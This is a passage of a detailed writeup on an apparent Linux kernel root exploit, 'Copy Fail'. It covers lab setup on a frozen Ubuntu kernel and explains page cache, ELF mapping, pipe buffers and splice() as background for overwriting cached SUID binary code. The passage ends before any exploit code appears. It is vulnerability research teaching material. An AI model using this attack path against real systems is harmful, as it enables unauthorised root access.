0 TLDR
The name "Copy Fail" is almost ironic. The "copy" is not a normal copy into a private buffer; it is zero-copy splice() carrying a file-backed page reference into the crypto scatterlist path. The "fail" fails as a safety boundary: the AEAD decrypt may return an authentication error, but only after authencesn() has already corrupted the page cache.
This post is the full kill chain: page cache, pipes, splice(), AF_ALG, AEAD request construction, scatterlist walking, the authencesn() scratch write, and finally the PoC path from a 4-byte primitive to code execution. It is long by design. If you follow it end to end, Copy Fail stops being a mysterious one-liner exploit and becomes a clean kernel data-flow bug.
The writeup closes with multi-language exploit implementations tailored for different runtime environments in Chapter 7, for readers who want to jump straight to the final exploits.
1 Preface
1.1 Copy Fail Overview
"Copy Fail" is the name given to CVE-2026-31431, a Linux kernel vulnerability that allows a low-priviledge user to instantly escalate to root, by overwriting the protected page-cache kernel memory which belongs to any read-only files.
The vulnerability exists in the interaction between:
- the Linux kernel crypto subsystem (
AF_ALG), - Linux zero-copy pipe mechanisms (
splice()), - and page-cache buffer handling.
Under the vulnerable scenario, the kernel mistakenly allows attacker-controlled data to be copied into file-backed cached pages, that should never become writable through unprivileged operations.
The conceptual attack flow looks like this:
userspace kernel
════════════════════════════════════════════════════
normal process
│
│ socket(AF_ALG) + splice()
│
▼
┌─────────────────┐ ┌──────────────────────┐
│ vulnerable copy │───────────▶│ page cache corruption│
└─────────────────┘ unintended │ (readonly file page) │
write └──────────┬───────────┘
│
│ cached executable
┌────────────────────┐ │ code page modified
│ target SUID binary │ ◀──────────────────┘
└────────┬───────────┘
│
│ executes modified code
│
▼
rootThe high-level picture is clean and easy to understand. Historically, many Linux kernel privilege escalations relied on fragile timing windows, TOCTOU bugs, or memory races, with Dirty COW being the classic example. Copy Fail, however, behaves much more deterministically with page cache corruption driven through kernel data-flow.
1.2 Page Cache Corruption
Unlike traditional file corruption vulnerabilities, Copy Fail does not directly modify the file stored on disk. Instead, it corrupts the in-memory page-cache representation of the file maintained by the Linux kernel.
If we are familiar with how Linux userspace memory maps into kernel, the concept is trial to understand:
disk kernel
════════════════════════════════════════════════════
[VICTIM]
┌──────────────┐ mapped into physical memory
│ /usr/bin/su │──────────────────────────┐
└──────────────┘ │
any SUID binary │
original bytes │
│
▼
[TARGET] ┌────────────────────┐
cached .text page │ page cache page │
executable in RAM └──────────┬─────────┘
│
│ Copy Fail
│ corrupts here
[TRIGGER] SUID process maps ▼
┌─────────────┐ corrupted code ┌─────────────────┐
│ User calls │─────────────────▶│ corrupted .text │
│ /usr/bin/su │ │ page in cache │
└──────┬──────┘ └────────┬────────┘
│ │
▼ shell code │
exected as root ◀───────────────────────┘After the page-cache corruption, the victim binary, such as a SUID executable owned by root, can still appear untouched on disk — but the executable bytes consumed by the kernel may already be modified in memory.
That results in a jalibreak on a critical kernel security invariant:
Kernel read-only cached file pages must never become writable through unprivileged users.
1.3 References
Articles worth reading to have an initial overview of the vulnerability and kernel exploitation, that are referenced throughout this writeup:
- Linux kernel programming: GitHub - PacktPublishing/Linux-Kernel-Programming
- Linux network programming: GitHub - nguyenchiemminhvu/LinuxNetworkProgramming
- Copy Fail official page: Copy Fail — CVE-2026-31431
- Copy Fail official writeup: Copy Fail: 732 Bytes to Root on Every Major Linux Distribution. - Xint
2 Environment Setup
2.1 Lab Baseline
2.1.1 Ubuntu Image Installation
The lab uses Ubuntu 24.04.1 Desktop: ubuntu-24.04.1-desktop-amd64.iso
During installation, I recommend temporarily disconnecting the VM from the Internet. This prevents the installer from pulling newer packages or silently moving the kernel away from the target version.
Before installing any tooling, freeze the lab immediately so the kernel does not drift after a reboot, background timer, or automatic package refresh:
# Disable unattended upgrades
sudo systemctl disable --now unattended-upgrades.service
sudo systemctl mask unattended-upgrades.service
# Disable APT periodic timers
sudo systemctl disable --now apt-daily.timer apt-daily-upgrade.timer
sudo systemctl mask apt-daily.timer apt-daily-upgrade.timer
# Disable APT periodic services
sudo systemctl disable --now apt-daily.service apt-daily-upgrade.service
sudo systemctl mask apt-daily.service apt-daily-upgrade.service
# Disable APT periodic upgrade policy
sudo tee /etc/apt/apt.conf.d/99-no-auto-upgrades >/dev/null <<'EOF'
APT::Periodic::Update-Package-Lists "0";
APT::Periodic::Download-Upgradeable-Packages "0";
APT::Periodic::AutocleanInterval "0";
APT::Periodic::Unattended-Upgrade "0";
EOF
# Hold the current kernel packages
sudo apt-mark hold \
linux-generic \
linux-image-generic \
linux-headers-generic \
linux-modules-extra-$(uname -r) \
linux-image-$(uname -r) \
linux-headers-$(uname -r)Verify that the automatic upgrade path is disabled:
systemctl list-unit-files | grep -E 'apt-daily|unattended'
apt-config dump | grep -E 'APT::Periodic'Confirm the kernel baseline before moving on. In this lab, the target kernel is 6.8.0:
axura@pwnlab:~$ uname -a Linux pwnlab 6.8.0-41-generic #41-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 2 20:41:06 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
2.1.2 Tooling Installation
After the frozen baseline snapshot is created, reconnect the network and install the lab tooling.
Do not run any full-system upgrade commands for lab purpose:
Bashsudo apt upgrade sudo apt full-upgrade sudo do-release-upgrade
Install the core build, tracing, debugging, and reversing tools:
sudo apt update && sudo apt install -y \
build-essential make cmake nasm \
gcc-multilib gdb gdb-multiarch \
git vim curl tmux gawk ripgrep htop jq silversearcher-ag tree unzip bison flex bc ssh \
strace ltrace vmtouch \
python3 python3-pip python3-venv python3-dev \
pkg-config \
libssl-dev libelf-dev libcapstone-dev libncurses-dev \
qemu-system-x86 qemu-utils qemu-kvm \
linux-tools-common linux-tools-generic linux-tools-$(uname -r) \
bpftrace trace-cmd Install Python exploitation tooling:
pip3 install --break-system-packages \
pwntools \
ropper \
capstone \
unicorn \
keystone-engine \
z3-solver2.2 Kernel Symbols and Source Mapping
For kernel tracing, source lookup, and structure inspection, install the source and debugging helpers:
sudo apt install -y \
python3-drgn \
crash \
dwarves \
systemtap \
linux-headers-$(uname -r) \
linux-sourceUnder /usr/src, the layout should look similar to this:
axura@pwnlab:~$ ls /usr/src/ -l total 16 drwxr-xr-x 26 root root 4096 May 12 2026 linux-headers-6.8.0-41 drwxr-xr-x 7 root root 4096 May 12 2026 linux-headers-6.8.0-41-generic drwxr-xr-x 2 root root 4096 May 12 16:10 linux-source-6.8.0 lrwxrwxrwx 1 root root 45 Apr 12 04:54 linux-source-6.8.0.tar.bz2 -> linux-source-6.8.0/linux-source-6.8.0.tar.bz2 drwxr-xr-x 4 root root 4096 May 12 16:03 python3.12
Extract the kernel source into workspace:
mkdir -p ~/source
cd ~/source
sudo tar -xf /usr/src/linux-source-*.tar.bz2We should now see the kernel source tree like:
axura@pwnlab:~/source$ tree linux-source-6.8.0/ -L 1 linux-source-6.8.0/ ├── arch ├── block ├── certs ├── COPYING ├── CREDITS ├── crypto ├── Documentation ├── drivers ├── dropped.txt ├── fs ├── generic.depmod.log ├── generic.inclusion-list.log ├── include ├── init ├── io_uring ├── ipc ├── Kbuild ├── Kconfig ├── kernel ├── lib ├── LICENSES ├── MAINTAINERS ├── Makefile ├── mm ├── net ├── README ├── rust ├── samples ├── scripts ├── security ├── sound ├── tools ├── ubuntu ├── Ubuntu.md ├── usr └── virt 26 directories, 11 files
3 Kernel Prerequisites
This chapter does not try to teach the Linux kernel from scratch. It only builds the pieces needed to follow the Copy Fail path. Some background materials are listed in Section 1.3 for a deeper study path, especially a book like Linux Kernel Programming which tells how exactly kernel works beneath the hood.
3.1 File-backed Execution and Page Cache
3.1.1 File-backed Executable Mappings
A Linux process does not see raw physical RAM directly. Instead, it runs inside its own virtual address space (VAS), which is divided into several mappings. A mapping is just a virtual memory region with:
- a backing source
- and a set of permissions
This is the very basic of Linux internal — Linux Kernel Programming displays a well-crafted process VAS diagram. The relevant part for us here is that the executable text region and shared libraries appear as mappings inside the process address space.

Some mappings are anonymous, meaning they are not backed by any file, such as heap growth or freshly allocated memory. Others are file-backed, meaning their contents come from a file mapped into memory. Executable code is usually reached through file-backed mappings: the program's .text region and shared libraries (e.g., libc.so.6) are mapped into the process VAS rather than copied byte-for-byte into a private buffer.
To understand Copy Fail, we need a deeper dive beyond the generic VAS view. A file-backed executable mapping is not "just memory"; it is a userspace virtual range that the kernel ties back to a file object.
userspace kernel
═════════════════════════════════════════════════════════════════
virtual address 0x5... inside .text
│
│ process executes from mapped ELF region
▼
┌─────────────────────────────┐
│ VMA / userspace mapping │
│ r-x file-backed region │ e.g.
│ e.g. /usr/bin/su .text │ 555555554000-555555556000 r--p /usr/bin/su
└──────────────┬──────────────┘ 555555556000-55555557a000 r-xp /usr/bin/su
│
│ page-table lookup
│ virtual → physical translation
│
└────────────────────────────────┐
▼
┌─────────────────────────────┐
│ page-table entries │
0x5555... → phys 0x1ab000 │ virtual → physical mapping │
└──────────────┬──────────────┘
│
│ points to
▼
┌─────────────────────────────┐
│ struct page │
e.g. PFN 0x1ab │ physical page frame │
└──────────────┬──────────────┘
│
│ represents cached bytes from
▼
┌─────────────────────────────┐
│ page cache page │
e.g. file offset 0x2000 │ /usr/bin/su + 0x2000 │
└──────────────┬──────────────┘
│
│ tracked by
▼
┌─────────────────────────────┐
│ inode(/usr/bin/su) │
│ address_space cache tree │
└──────────────┬──────────────┘
│
│ originally loaded from
▼
┌─────────────────────────────┐
│ file on disk │
│ /usr/bin/su │
└─────────────────────────────┘The exact page-fault-handling details can wait until later in 3.1.3. For now, the important idea is narrower: a file-backed executable mapping still points back to a real file and file offset, rather than to an anonymous private buffer.
3.1.2 ELF Loading Through Execve
When a program is launched, the kernel handles it through execve(). For a normal ELF binary, the kernel parses the ELF metadata and creates a new process image whose mappings correspond to the ELF's loadable segments.
From the kernel's perspective:
userspace kernel
════════════════════════════════════════════════════════
process calls syscall
execve("/usr/bin/su")
│ context switch -> kernel mode
└────────────────────────────────┐
│
▼
┌─────────────────────────┐
│ handle execve syscall │
└────────────┬────────────┘
│
▼
┌─────────────────────────┐
│ readfile /usr/bin/su │
│ parse ELF headers │
│ inspect PT_LOAD entries │
└────────────┬────────────┘
│
▼
┌─────────────────────────┐
│ create userspace VMAs │
│ backed by /usr/bin/su │
│ │
│ .text → r-x │
│ .rodata → r-- │
│ .data → rw- │
└────────────┬────────────┘
│
▼
┌─────────────────────────┐
│ [!] connect VMAs to │
│ page-cache pages │
└────────────┬────────────┘
│
│ returns to user mode
┌────────────────────────────────┘
│
▼
process begins execution
at ELF entry point using mapped .text pagesThe code-level evidence is in the ELF loader. During load_elf_binary(), the kernel maps each PT_LOAD segment through elf_map(), and elf_map() ultimately calls vm_mmap(filep, ...) on the executable file:
static unsigned long elf_map(struct file *filep, unsigned long addr,
const struct elf_phdr *eppnt, int prot, int type,
unsigned long total_size)
{
...
map_addr = vm_mmap(filep, addr, size, prot, type, off);
...
}So for an executable like /usr/bin/su, execve() does not first construct a private in-memory image of .text. It creates VMAs whose backing file is still /usr/bin/su; later execution faults resolve against that file-backed mapping.
For Copy Fail, the important segment is .text: the machine code that the CPU will actually execute. Under normal conditions, this region is mapped read-only and executable.
axura@pwnlab:~$ objdump -h /usr/bin/su | head -n5 \ && objdump -h /usr/bin/su | grep text -A1 /usr/bin/su: file format elf64-x86-64 Sections: Idx Name Size VMA LMA File off Algn 15 .text 00005d02 0000000000003f80 0000000000003f80 00003f80 2**4 CONTENTS, ALLOC, LOAD, READONLY, CODE
Those READONLY and CODE properties are the core security descriptors. At runtime, the corresponding /usr/bin/su executable mapping appears as r-xp:
pwndbg> vmmap LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA Start End Perm Size Offset File (set vmmap-prefer-relpaths on) 0x555f8bd7e000 0x555f8bd81000 r--p 3000 0 /usr/bin/su 0x555f8bd81000 0x555f8bd88000 r-xp 7000 3000 /usr/bin/su 0x555f8bd88000 0x555f8bd8a000 r--p 2000 a000 /usr/bin/su 0x555f8bd8a000 0x555f8bd8b000 r--p 1000 c000 /usr/bin/su 0x555f8bd8b000 0x555f8bd8c000 rw-p 1000 d000 /usr/bin/su ...
Here, p indicates a private mapping, meaning modifications are handled privately through mechanisms such as copy-on-write rather than being written back as a shared writable file mapping; while the pathname /usr/bin/su shows that this VMA is backed by an executable file on disk.
This is the part that can feel counterintuitive to a userspace pwner: the r-xp permission only describes the userspace VMA. It does not mean the underlying file-backed cache page is impossible to corrupt through a kernel bug.
If an attacker can modify those backing bytes, the mapping may still look read-only from userspace, while the instructions fetched from the page cache have already changed.
Once that boundary is broken, the most dangerous target class is obvious: root-owned SUID binaries such as /usr/bin/su. If we can hijack the page-cache-backed .text bytes of an SUID executable, the next execution may fetch attacker-controlled instructions from cache while the process runs with elevated privileges.
So the real question becomes:
Can an unprivileged user corrupt page-cache-backed executable bytes for a read-only file?
3.1.3 Linux Page Cache
The page cache is the kernel's in-memory cache for file-backed data. When a process reads, maps, or executes a file, Linux can serve the bytes from cached pages in RAM instead of fetching them from disk every time.
For Copy Fail, the page cache is the critical target:
file on disk
│
│ read / mmap / execve
▼
page-cache page
│
│ mapped into process as file-backed memory
▼
userspace VMA3.1.3.1 Runtime Cache Inspection
Linux exposes system-wide file-cache accounting through /proc/meminfo:
axura@pwnlab:~$ grep -E 'Cached|Buffers|Active\\(file\\)|Inactive\\(file\\)' /proc/meminfo Buffers: 42512 kB Cached: 1090328 kB SwapCached: 0 kB axura@pwnlab:~$ free -h total used free shared buff/cache available Mem: 7.7Gi 1.3Gi 5.6Gi 44Mi 1.1Gi 6.4Gi Swap: 3.8Gi 0B 3.8Gi
In this lab, both commands reported about 1.1 GiB in cache usage, confirming that the kernel is already holding a substantial amount of file-backed data in memory.
We can then narrow that view to a single file:
axura@pwnlab:~$ vmtouch -v /usr/bin/su /usr/bin/su [OOOOOOOOOOOOOO] 14/14 Files: 1 Directories: 0 Resident Pages: 14/14 56K/56K 100% Elapsed: 6.4e-05 seconds
This shows that /usr/bin/su currently has resident file-backed pages in page cache. However, it does not yet prove how executable .text mappings reach those pages.
3.1.3.2 Page-cache Object Model
To reason about page-cache corruption, we need the kernel object model. On Linux, executable mappings are ultimately backed by regular files on disk. At the filesystem layer, each regular file is represented by an inode, which owns the file's page-cache mapping:
axura@pwnlab:~$ stat /usr/bin/su File: /usr/bin/su Size: 55680 Blocks: 112 IO Block: 4096 regular file Device: 8,2 Inode: 2383706 Links: 1 Access: (4755/-rwsr-xr-x) Uid: ( 0/ root) Gid: ( 0/ root) Access: 2026-05-13 12:32:47.267708839 +0800 Modify: 2026-03-07 00:00:54.000000000 +0800 Change: 2026-05-13 11:44:17.032955828 +0800 Birth: 2026-05-13 11:44:16.979947665 +0800
For page-cache purposes, the important members of struct inode are i_mapping and the embedded i_data:
struct inode {
...
struct address_space *i_mapping; // pointer to page-cache mapping for this file
...
struct address_space i_data; // stores metadata about the file's cached pages
...
};So each inode links to the file's page cache, represented by a per-file struct address_space:
struct address_space {
struct inode *host;
struct xarray i_pages;
...
struct rb_root_cached i_mmap;
...
};The fields that matter here are:
host: which file this cache belongs toi_pages: the xarray that stores cached file folios/pages by file offseti_mmap: the set of user VMAs mapping this file's cached contents
For /usr/bin/su, the corresponding inode owns an address_space object; that address_space stores cached file data in i_pages and tracks user mappings in i_mmap.
Conceptually:
file on disk: /usr/bin/su
│
▼
┌───────────────┐
│ inode │
└───────┬───────┘
│ owns
▼
┌─────────────────────────────┐
│ address_space │
│ │
│ host -> this inode │
│ i_pages -> cached folios │────▶ cached executable page, e.g. file offset 0x2000
│ i_mmap -> mapped VMAs │────▶ VMA in proc A: /usr/bin/su r-xp
└─────────────────────────────┘ VMA in proc B: /usr/bin/su r-xp
VMA in proc C: /usr/bin/su r-xp
...The same address_space object, namely the page cache, can then be reused by future processes mapping the same file.
3.1.3.3 Executable Fault Path
The missing link aforementioned is the page fault path: when an executable mapping (.text) needs bytes from /usr/bin/su, where does the kernel fetch them from?
For file-backed VMAs, the page fault handler is filemap_fault(). Its first fields expose the chain directly:
vm_fault_t filemap_fault(struct vm_fault *vmf)
{
// file mapped by the faulting VMA
struct file *file = vmf->vma->vm_file;
// page-cache mapping associated with the file
struct address_space *mapping = file->f_mapping;
// inode owning this page-cache mapping
struct inode *inode = mapping->host;
// page-cache index for the faulting offset
pgoff_t index = vmf->pgoff;
...
/*
* Do we have something in the page cache already?
*/
folio = filemap_get_folio(mapping, index);
// Try to find the cached folio/page for this file offset
...
}This proves that executable bytes are resolved through the file's page-cache mapping. So again this is the core idea of Copy Fail: If that cached page has been corrupted, the read-only VMA thus was also corrupted from the origin.
3.1.3.4 Cache Lookup
As we can see from the execution flow of filemap_fault(), when a process faults on a file on disk through a file-backed executable VMA, the kernel starts locating the file from vmf->vma->vm_file, follows file->f_mapping, and then looks up the corresponding cached folio/page from the file's page-cache mapping.
The final lookup operation is done by filemap_get_folio(mapping, index), which reaches __filemap_get_folio():
struct folio *__filemap_get_folio(struct address_space *mapping, pgoff_t index,
fgf_t fgp_flags, gfp_t gfp)
{
struct folio *folio;
repeat:
// lookup cached folio/page by file offset
folio = filemap_get_entry(mapping, index);
...
if (!folio)
goto no_page;
...
return folio;
no_page:
// on a cache miss, allocate and insert a new folio
// if the caller requested creation
if (!folio && (fgp_flags & FGP_CREAT)) {
...
folio = filemap_alloc_folio(alloc_gfp, order);
...
err = filemap_add_folio(mapping, folio, index, gfp);
...
}
return folio;
}That gives the cache behavior:
- cache hit → reuse existing folio for this file offset
- cache miss → allocate folio → insert into file mapping → later accesses may reuse it
This is why page-cache corruption is powerful. Once a file-backed folio is modified in memory, later reads, mappings, or executions of the same file offset may observe the modified cached bytes until the cache is invalidated or reloaded.
3.1.3.5 Buffered Read Path
The same cache object is also used by ordinary buffered file reads. generic_file_read_iter() dispatches into filemap_read(), whose comment states the model directly:
/**
* filemap_read - Read data from the page cache.
* @iocb: The iocb to read.
* @iter: Destination for the data.
* @already_read: Number of bytes already read by the caller.
*
* Copies data from the page cache. If the data is not currently present,
* uses the readahead and read_folio address_space operations to fetch it.
*
* ...
*/
ssize_t filemap_read(struct kiocb *iocb, struct iov_iter *iter,
ssize_t already_read) { ... }3.1.3.6 Page-cache Takeaway
Execution faults and buffered reads both converge on the same model: the page cache is the shared, kernel-resident copy of file data consulted by file-backed mappings and ordinary file reads.
system boot
══════════════════════════════════════════════════════
initialize memory manager
initialize page allocator
initialize page-cache infrastructure
│
│ no file pages cached yet
▼
page cache starts empty
runtime
══════════════════════════════════════════════════════
process executes, reads, or maps /usr/bin/su
│
│ execve() / read() / mmap()
▼
kernel requests file-backed data
│
│ load from disk on cache miss
▼
┌──────────────────────────────┐
│ page cache │
│ cached /usr/bin/su pages │
│ executable file data in RAM │
└──────────────┬───────────────┘
│
│ reused by later access
▼
proc A → /usr/bin/su
proc B → /usr/bin/su
proc C → /usr/bin/suSo if we manage to corrupt the cached page for a file offset, later consumers of that same file-backed data may observe the corrupted bytes even when the read-only on-disk file remains unchanged. That is the page-cache side of Copy Fail.
3.1.4 Page-cache Write Boundary
Userspace can read file-backed pages, execute them, and even create private writable copies (e.g. the r-xp VMA). The security boundary is narrower:
An unprivileged path must not mutate the shared page-cache page behind a file unless it has legitimate write authority over that file-backed state.
This distinction matters because executable file pages are often shared kernel-resident state:
- a private write must create an anonymous copy
- a shared write must require write permission to the file
Direct mutation of a cached executable page through an unrelated kernel path violates that boundary.
The mmap() path encodes this boundary before a file-backed VMA is created. In do_mmap(), a writable shared mapping is rejected unless the file was opened writable:
case MAP_SHARED:
case MAP_SHARED_VALIDATE:
// shared writable mmap requires writable file descriptor
if (prot & PROT_WRITE) {
if (!(file->f_mode & FMODE_WRITE))
return -EACCES;
...
}
...
// remove VMA write/share capability if fd is read-only
if (!(file->f_mode & FMODE_WRITE))
vm_flags &= ~(VM_MAYWRITE | VM_SHARED);The VMA permission bits are defined in include/linux/mm.h:
VM_WRITEmeans the mapping is currently writable.VM_MAYWRITEmeans the mapping may later become writable throughmprotect().
The page-fault path preserves the same boundary. sanitize_fault_flags() rejects write faults on mappings that lack VM_MAYWRITE as invalid and raises SIGSEGV. For private writable mappings, do_wp_page() resolves the write fault through wp_page_copy(), creating a private anonymous copy instead of modifying the shared file-backed page.
The normal model is:
| Mapping / Operation | Behavior |
|---|---|
| Read/execute file-backed page | Allowed, backed directly by page cache |
Private writable mapping (MAP_PRIVATE) | Allowed through Copy-on-Write (COW) |
Shared writable mapping (MAP_SHARED) | Requires FMODE_WRITE |
| Write into read-only page cache | Forbidden |
The normal boundary is visible from userspace. A shared writable mapping (MAP_SHARED | PROT_WRITE) of /usr/bin/su through a read-only file descriptor is denied as expected:
axura@pwnlab:~$ sudo python3 - <<'PY' import mmap, os fd = os.open("/usr/bin/su", os.O_RDONLY) try: mmap.mmap(fd, 4096, prot=mmap.PROT_READ | mmap.PROT_WRITE, flags=mmap.MAP_SHARED) print("unexpected: shared writable mapping succeeded") except OSError as e: print(f"MAP_SHARED|PROT_WRITE failed as expected: {e}") finally: os.close(fd) PY MAP_SHARED|PROT_WRITE failed as expected: [Errno 13] Permission denied
The same file can still be mapped privately with write permission. In that case, the write is process-local: it updates the private mapping and leaves the file-backed page-cache contents unchanged.
axura@pwnlab:~$ python3 - <<'PY' import mmap, os path = "/usr/bin/su" fd = os.open(path, os.O_RDONLY) before = open(path, "rb").read(1) m = mmap.mmap(fd, 4096, prot=mmap.PROT_READ | mmap.PROT_WRITE, flags=mmap.MAP_PRIVATE) m[0:1] = b"X" after_file = open(path, "rb").read(1) print("private mapping byte:", m[0:1]) print("file byte unchanged:", after_file == before) m.close() os.close(fd) PY private mapping byte: b'X' file byte unchanged: True
The two results match the kernel-side invariant. The shared writable mapping fails with EACCES, while the private mapping shows b'X' only inside the process-local view and confirms that the file byte is unchanged. Copy Fail becomes security-critical because it reaches the cached executable page from a different subsystem: the attacker does not need a normal writable file mapping if the crypto path can be tricked into writing into that shared page directly.
These two results match the kernel-side invariant:
MAP_SHARED | PROT_WRITE→ denied without file write authorityMAP_PRIVATE | PROT_WRITE→ allowed, but writes go to a private COW page
This design is safe and solid — for a normal writable file mapping. But Copy Fail reaches the cached executable page from a different subsystem.
Next we will dive into that special subsystem, the kernel crypto path, which can be tricked into writing a tiny piece of page cache — that's why we call it a scratch write primitive.
3.2.1 Pipe Buffer Model
At the userspace API level, a pipe behaves like a byte stream: write() pushes bytes in, and read() pulls bytes out.
The classic model looks like this:
int fd[2];
pipe(fd);
write(fd[1], "hello", 5);
char buf[16];
read(fd[0], buf, 5);That abstraction is correct for ordinary programming, but it is not the model that matters for Copy Fail. Inside the kernel, a pipe is not one flat byte array. It is a ring of buffer descriptors, and each descriptor points to the memory backing part of the stream.
That distinction matters because splice() can make a pipe carry references to existing pages instead of freshly copied anonymous data.
The kernel pipe object is struct pipe_inode_info. The fields relevant here are head, tail, ring_size, and bufs:
struct pipe_inode_info {
...
unsigned int head;
unsigned int tail;
unsigned int ring_size;
struct pipe_buffer *bufs; // ring of pipe_buffer descriptors
...
};So the internal shape is:
pipe_inode_info
└── bufs[] ring
├── pipe_buffer
├── pipe_buffer
└── ...Each slot is a struct pipe_buffer:
struct pipe_buffer {
struct page *page; // backing page
unsigned int offset, len; // where the data starts inside that page
const struct pipe_buf_operations *ops; // how many bytes are valid
unsigned int flags; // rules for handling this buffer
unsigned long private; // buffer state
};The important point is that a pipe slot does not just mean "here are some bytes." It means: "the current data lives in this page, starting at this offset, for this length, under these buffer-specific rules".
The ordinary pipe_write() path often copies userspace bytes into pipe-owned pages through copy_page_from_iter(). But the data structure itself is more general:
A
pipe_buffercan also describe pages supplied by other kernel paths.
Although at userspace level, the pipe still looks like a normal byte stream:
axura@pwnlab:~$ python3 - <<'PY' import os r, w = os.pipe() os.write(w, b"hello pipe") print(os.read(r, 10)) os.close(r) os.close(w) PY b'hello pipe'
The output is just b'hello pipe' — that is the abstraction userspace sees. Copy Fail depends on what this abstraction hides: the pipe internally advances through pipe_buffer descriptors, and those descriptors may later refer to non-anonymous file-backed pages supplied by other kernel subsystems.
3.2.2 Page References in Pipe Buffers
Like a class in Python or an object in Java, struct pipe_buffer is not a flat stream as mentioned before. And it does not just say which bytes are visible (page, len) through the pipe; through ops and flags, it also tells later kernel code what kind of backing page this is and how that page may be handled.
struct pipe_inode_info
+--------------------------------------+
| head / tail / ring_size |
| |
| bufs[] ring |
| tail head |
| v v |
| +------+------+------+------+---+ |
| | buf0 | buf1 | buf2 | buf3 |...| |
| +------+------+------+------+---+ |
| indices advance modulo ring_size |
+--------------------------------------+
| | |
v v v
struct pipe_buffer descriptors
+-----------------------------+
| page -> backing page |
| offset -> start in page |
| len -> visible bytes |
| ops -> buffer operations |
| flags -> buffer provenance |
+---------------+-------------+
|
+---------------+---------------+
| |
v v
anonymous page file-backed page-cache page
from ordinary write() from splice()That last split is the reason this structure matters for Copy Fail. A pipe slot can describe ordinary pipe-owned memory, but it can also describe a file-backed page that came from another kernel path.
The policy side is expressed through struct pipe_buf_operations:
struct pipe_buf_operations {
int (*confirm)(...); // validate buffer before use
void (*release)(...); // drop references / cleanup
bool (*try_steal)(...); // transfer page ownership if possible
bool (*get)(...); // acquire another page reference
};To understand how pipe buffers connect the backing pages, and also make a comparion to the later 3.2.3 splice movement, we can observe how an ordinary write() works.
First, it reaches pipe_write() and installs anon_pipe_buf_ops:
static const struct pipe_buf_operations anon_pipe_buf_ops = {
.release = anon_pipe_buf_release,
.try_steal = anon_pipe_buf_try_steal,
.get = generic_pipe_buf_get,
};
...
buf->ops = &anon_pipe_buf_ops; // dispatch pipe operationsFrom that point onward, later pipe operations dispatch through buf->ops:
pipe_buffer
└── ops
└── anon_pipe_buf_ops
├── .get -> generic_pipe_buf_get()
├── .release -> anon_pipe_buf_release()
└── .try_steal -> anon_pipe_buf_try_steal()The callbacks operate on the backing struct page, the first member of struct pipe_buffer.
generic_pipe_buf_get() acquires another reference to the same page:
bool generic_pipe_buf_get(struct pipe_inode_info *pipe,
struct pipe_buffer *buf)
{
return try_get_page(buf->page);
}generic_pipe_buf_release() later drops that reference:
void generic_pipe_buf_release(struct pipe_inode_info *pipe,
struct pipe_buffer *buf)
{
put_page(buf->page);
}generic_pipe_buf_try_steal() shows the same page-reference model from the ownership side:
bool generic_pipe_buf_try_steal(struct pipe_inode_info *pipe,
struct pipe_buffer *buf)
{
struct page *page = buf->page;
// Only steal if this is the last remaining page reference
if (page_count(page) == 1) {
// 1 means the pipe holds the only remaining page reference
lock_page(page); // caller now receives the locked page
return true; // ownership transfer succeeded
}
return false; // still referenced elsewhere; cannot steal
}The takeaway is simple:
pipe_buffer= page reference + byte range + handling policy
For ordinary write(), the referenced page is usually an anonymous pipe-owned page. For splice(), the referenced page may be a file-backed page-cache page. That is the bridge Copy Fail needs: later consumers may think they are reading a pipe byte stream (pipe_buffer), but the pipe slot may point to cached file data.
3.2.3 Zero-copy Transfer Model
The term zero-copy sounds more magical than it really is — it is the first ironic half of the name "Copy Fail".
But that does not mean "no kernel work happens." It means the kernel avoids copying bytes into a fresh intermediate buffer when it can pass around a reference to an existing page.
The previous section established the key abstraction, that pipe_buffer is already capable of naming an existing page and attaching policy to it — once a pipe buffer can point at an existing page, a producer does not always need to allocate a new anonymous pipe page and copy bytes into it. It can sometimes install a reference to a page that already exists elsewhere.
ordinary copied path
════════════════════════════════════════
source bytes
│
│ copy_page_from_iter()
▼
anonymous pipe-owned page
│
▼
pipe_buffer -> new page
zero-copy style path
════════════════════════════════════════
existing page
e.g. page-cache page
│
│ install page reference
▼
pipe_buffer -> existing pageThe contrast is visible in the ordinary pipe_write() path introduced above. There, the kernel allocates or reuses an anonymous pipe page and then copies userspace bytes into it with copy_page_from_iter():
copied = copy_page_from_iter(page, offset, chars, from);
buf->ops = &anon_pipe_buf_ops;That was NOT zero-copy: the data is materially copied into a pipe-owned page. By contrast, the page-reference model from the previous section allows another path to populate buf->page with an already existing page and then let later consumers operate on that same page through buf->ops.
That is not zero-copy. The bytes are materially copied into an anonymous pipe page.
The contrast looks like this:
ordinary write() splice()-style path
════════════════════════════════════════════════════════
userspace buffer file-backed page cache
+-------------------+ +--------------------+
| e.g. "hello pipe" | | existing file page |
+----------+--------+ +----------+---------+
| |
| copy_page_from_iter() | reference page
v v
┌─────────────────────┐ ┌─────────────────────┐
│ anonymous pipe page │ │ file-backed page │
└───────────┬─────────┘ └─────────┬───────────┘
| |
| copied | zero-copy
v v
+-----------------------------------------+
| struct pipe_buffer |
|-----------------------------------------|
| buf->page |
+-----------------------------------------+So in practice, zero-copy means page-backed state plus reference management via the pointer struct page *page. The bytes stay where they already are; what moves between kernel subsystems is the metadata that grants access to that page.
So the next question is: What's the magician behind that? — instead of copying file bytes into an anonymous pipe page, it's the splice() call who makes the pipe buffer reference the file's existing page-cache page directly.
3.2.4 Splice-backed Page Movement
With the pipe-buffer model in place, splice() stops looking like a quirky read/write shortcut. For Copy Fail, it is the zero-copy mechanism that moves page references across kernel subsystems.
There are two stages to keep separate:
- file → pipe: a file-backed page-cache page is installed into a pipe buffer.
- pipe → next consumer : that same pipe buffer can be forwarded into another kernel subsystem, such as a socket send path.
So the exploit-relevant shape is:
file-backed page cache
│
│ splice(file -> pipe)
▼
pipe_buffer references file page
│
│ splice(pipe -> consumer)
▼
next kernel consumer receives page-backed data3.2.4.1 File -> Pipe
At the syscall layer, splice() first resolves the userspace file descriptors into kernel struct file objects, then dispatches into the internal splice engine:
SYSCALL_DEFINE6(splice,
int, fd_in, loff_t __user *, off_in, // was userspace fd
int, fd_out, loff_t __user *, off_out,
size_t, len, unsigned int, flags)
/* splice(int fd_in, ..., int fd_out, ...) */
{
struct fd in, out;
ssize_t error;
...
in = fdget(fd_in);
if (in.file) {
out = fdget(fd_out);
if (out.file) {
/*
* transition 1
* fd_in / fd_out are now kernel struct file objects
*/
error = __do_splice(in.file, off_in, out.file, off_out,
len, flags);
